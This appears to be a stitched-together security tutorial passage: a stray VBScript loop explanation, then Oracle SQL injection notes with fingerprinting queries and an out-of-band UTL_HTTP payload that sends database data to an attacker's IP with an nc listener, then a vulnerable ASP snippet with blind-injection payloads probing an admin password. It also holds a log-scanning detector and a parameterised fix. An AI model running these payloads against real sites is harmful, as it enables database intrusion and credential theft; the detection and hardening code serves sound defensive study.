Finally, let us look at the For Each...Next statement. A For Each...Next loop is similar to For...Next, but instead of running statements a specified number of times it repeats a group of statements for each element of an array or each item in a collection, which is very useful when the number of items is not known in advance. Its syntax is:

For Each element In group
[statements]
[Exit For]
[statements]
Next [element]

Part 7: Un Oracle Injection Notes (Script Security)

Oracle notes:

Learning Oracle injection attacks can be grouped as follows:

a. Basic guessing:

1. Guessing the database name, table names, field names and data, i.e. basic data guessing (by bisection).

2. Guessing via UNION.

3. Bouncing data back out via UTL_HTTP.request (requires outbound internet access).

4. Other ways of guessing, such as writing table contents with UPDATE or INSERT into a field that is displayed somewhere (for example on a web page) and then reading it there.

b. Advanced attacks:

1. Database privilege escalation, usually by exploiting a function vulnerability to obtain DBA privileges (Oracle's DBA is the equivalent of MSSQL's sa, the highest database privilege).

2. Exporting a shell.

3. Using database vulnerabilities to execute system commands.

c. Database vulnerabilities:

1. Remote overflows, local privilege escalation and similar (we only care about the exploit).

2. Configuration weaknesses, such as default weak passwords, and how to escalate once a weak password has been obtained.

Part 1:

===================Guessing basic information=========================

Notes:

Oracle keeps a lot of useful information in system tables such as all_tables, so guessing against these tables during injection yields much of the basic information.

Operating system version:

select member from v$logfile where rownum=1

The path tells you the operating system: something like c: or d: means Windows, anything else is *nix.

SID:

select instance_name from v$instance

Privileges of the current user:

select * from session_roles

Current database version:

select banner from sys.v_$version where rownum=1

Outbound IP of the server:

can be obtained with utl_http.request

Listening IP of the server:

select utl_inaddr.get_host_address from dual

Currently connected user:

select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual

Bounce-back method (on your own machine: nc -vv -lp 8000):

www.target.com/servlet/bbs.Userdetail?sUserName=test' and UTL_HTTP.request('59.151.22.37:8000/'||(select instance_name from v$instance where rownum=1))=1--

==================Guessing basic information===========================

Guessing basic information mainly serves to make the later injection attack easier.
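Every query in the list above has a distinctive fingerprint (v$ views, SYS_CONTEXT, UTL_HTTP, UTL_INADDR) that a defender can look for in web-server logs. The following WSH script (run it with cscript) is an added example, not part of the original notes: it URL-decodes constructed access-log lines and flags those that contain these Oracle fingerprinting or out-of-band patterns. The three log lines and the IP addresses in them are constructed for this example; a real run would read the lines from a file with FileSystemObject.

```vbscript
' Added example: scan access-log lines for the Oracle fingerprinting and
' out-of-band (UTL_HTTP / UTL_INADDR) request patterns listed above.
Option Explicit

Dim patterns, entries, entry, p, hit, decoded

' Each entry: description, regular expression (matched case-insensitively
' against the URL-decoded log line).
patterns = Array( _
    Array("out-of-band request via UTL_HTTP", "utl_http\.request"), _
    Array("host address lookup via UTL_INADDR", "utl_inaddr\."), _
    Array("instance/version fingerprint", "v\$(instance|version|logfile)|sys\.v_\$version"), _
    Array("session user/role enumeration", "sys_context\s*\(|session_roles"), _
    Array("quote followed by boolean operator", "'\s*(and|or)\s+") _
)

' Constructed log lines (combined log format); the second and third carry
' URL-encoded versions of the requests described in this section.
entries = Array( _
    "10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] ""GET /servlet/bbs.Userdetail?sUserName=test HTTP/1.1"" 200 512", _
    "10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] ""GET /servlet/bbs.Userdetail?sUserName=test%27%20and%20UTL_HTTP.request(%27198.51.100.7:8000/%27%7C%7C(select%20instance_name%20from%20v$instance))=1-- HTTP/1.1"" 500 0", _
    "10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] ""GET /servlet/bbs.Userdetail?sUserName=test%27%20and%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%3E0-- HTTP/1.1"" 500 0" _
)

' Minimal URL decoding so encoded quotes and spaces become visible to the patterns.
Function UrlDecode(s)
    Dim re, m, out
    out = Replace(s, "+", " ")
    Set re = New RegExp
    re.Global = True
    re.Pattern = "%([0-9A-Fa-f]{2})"
    For Each m In re.Execute(out)
        out = Replace(out, m.Value, Chr(CLng("&H" & m.SubMatches(0))))
    Next
    UrlDecode = out
End Function

Function MatchesPattern(text, pattern)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = pattern
    MatchesPattern = re.Test(text)
End Function

' Report every line that matches at least one pattern, naming all the patterns it hit.
For Each entry In entries
    decoded = UrlDecode(entry)
    hit = ""
    For Each p In patterns
        If MatchesPattern(decoded, p(1)) Then hit = hit & "[" & p(0) & "] "
    Next
    If Len(hit) > 0 Then WScript.Echo "ALERT " & hit & vbCrLf & "  " & entry
Next
```

With the constructed input, the first line is silent and the other two are reported with the fingerprint and out-of-band patterns they contain. Decoding before matching matters: the raw line hides the quote and the spaces behind %27 and %20, so a pattern applied to the undecoded text would miss the boolean-operator signature.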

Part 8: A Snippet of ASP Code with an Injection Vulnerability

Someone sent me this piece of code:

<%
' As published: the search string given to Replace is empty, so nothing is stripped from id.
id1=replace(request("id"),"","")
if id1<>"" then
    set rs=server.createobject("adodb.recordset")
    id=id1
    ' The user-controlled id is concatenated straight into the SQL text: this is the injection point.
    sql="select * from MusicList where id in (" & id & ")"
    rs.open sql,conn,1,3
    rs("hits")=rs("hits")+1
    rs.update
    songpath=rs("song_path")
    If songpath="" or IsNull(songpath) Then
        songpath=1
    End If
    select Case songpath
        Case 1
            song_path=song_path1
        Case 2
            song_path=song_path2
        Case 3
            song_path=song_path3
        Case 4
            song_path=song_path4
        Case 5
            song_path=song_path5
        Case 6
            song_path=song_path6
        Case 7
            song_path=song_path7
    End select
    song_path=song_path&rs("Wma")
    while not rs.eof
%>
<%=rs("Musicname")%>
www.lgrx.com.cn
歌手和唱片公司所有
<%=song_path%>"/>
<%=rs("Singer")%>"/>
<%=rs("hits")%>人气"/>
<%=rs("Musicname")%>"/>
<%
        rs.movenext
    wend
    rs.Close
    set rs=nothing
end if
conn.close
set conn=nothing
%>

Note that id goes into the SQL statement with essentially no filtering. Simple, right? But

rs("hits")=rs("hits")+1
rs.update

rule out a UNION query, because the result set of a UNION is not updatable. That leaves only the classic injection:

id=1) sql and 1 in (1

The parts before and after make sure a record is returned, and our own SQL statement goes in the middle, so injection is possible. The key table here is admin, with the fields password and username.

So we can do this:

id=1) and (select top 1 len(password) from admin)=16 and 1 in (1

The page returns normally, so the statement is true, which suggests the password is stored as an MD5 hash.

....

I will leave the rest unsaid; work it out yourself.
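The snippet in this part (and the Oracle request in Part 7) both fail for the same reason: a request parameter is concatenated into the SQL text. Below is an added hardened version of the MusicList lookup; it is my example, not code from the post or its author. It keeps the table and column names from the snippet (MusicList, id, hits, Musicname, Singer, song_path, Wma) and assumes conn is an ADODB.Connection opened elsewhere on the page. It differs from the original in two deliberate ways: it accepts a single numeric id rather than a comma-separated list (a list would be validated element by element), and it increments hits with an UPDATE instead of an updatable recordset. The ADO constants 1 (adCmdText / adParamInput) and 3 (adInteger) are the real values.

```vbscript
<%
' Added example: hardened replacement for the vulnerable MusicList lookup.
' conn is assumed to be an open ADODB.Connection created elsewhere on the page.
Dim rawId, songId, re, cmd, rs

rawId = Trim(Request.QueryString("id"))

' 1. Validate: only a plain positive integer of up to 9 digits is accepted, so
'    a value such as "1) and (select top 1 len(password) from admin)=16 and 1 in (1"
'    is rejected before any database code runs.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid id"
    Response.End
End If
songId = CLng(rawId)

' 2. Parameterise: the value is bound as a typed parameter and never becomes
'    part of the SQL text, so it cannot change the shape of the statement.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1                                     ' adCmdText
cmd.CommandText = "UPDATE MusicList SET hits = hits + 1 WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , songId)   ' adInteger, adParamInput
cmd.Execute

cmd.CommandText = "SELECT Musicname, Singer, hits, song_path, Wma FROM MusicList WHERE id = ?"
cmd.Parameters(0).Value = songId
Set rs = cmd.Execute

If Not rs.EOF Then
    ' 3. Encode on output so stored data cannot inject markup into the page.
    Response.Write Server.HTMLEncode(rs("Musicname")) & " - " & Server.HTMLEncode(rs("Singer"))
    Response.Write " (" & rs("hits") & " 人气)"
Else
    Response.Status = "404 Not Found"
End If

rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

The Oracle example in Part 7 injects through a string parameter rather than a number; the fix is the same, binding sUserName with CreateParameter using adVarChar (type 200) and a length instead of concatenating it. Note also that validation alone (step 1) would already defeat the specific payload in this post, but the bound parameter (step 2) is what protects the query against every other value, including ones a regular expression did not anticipate.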
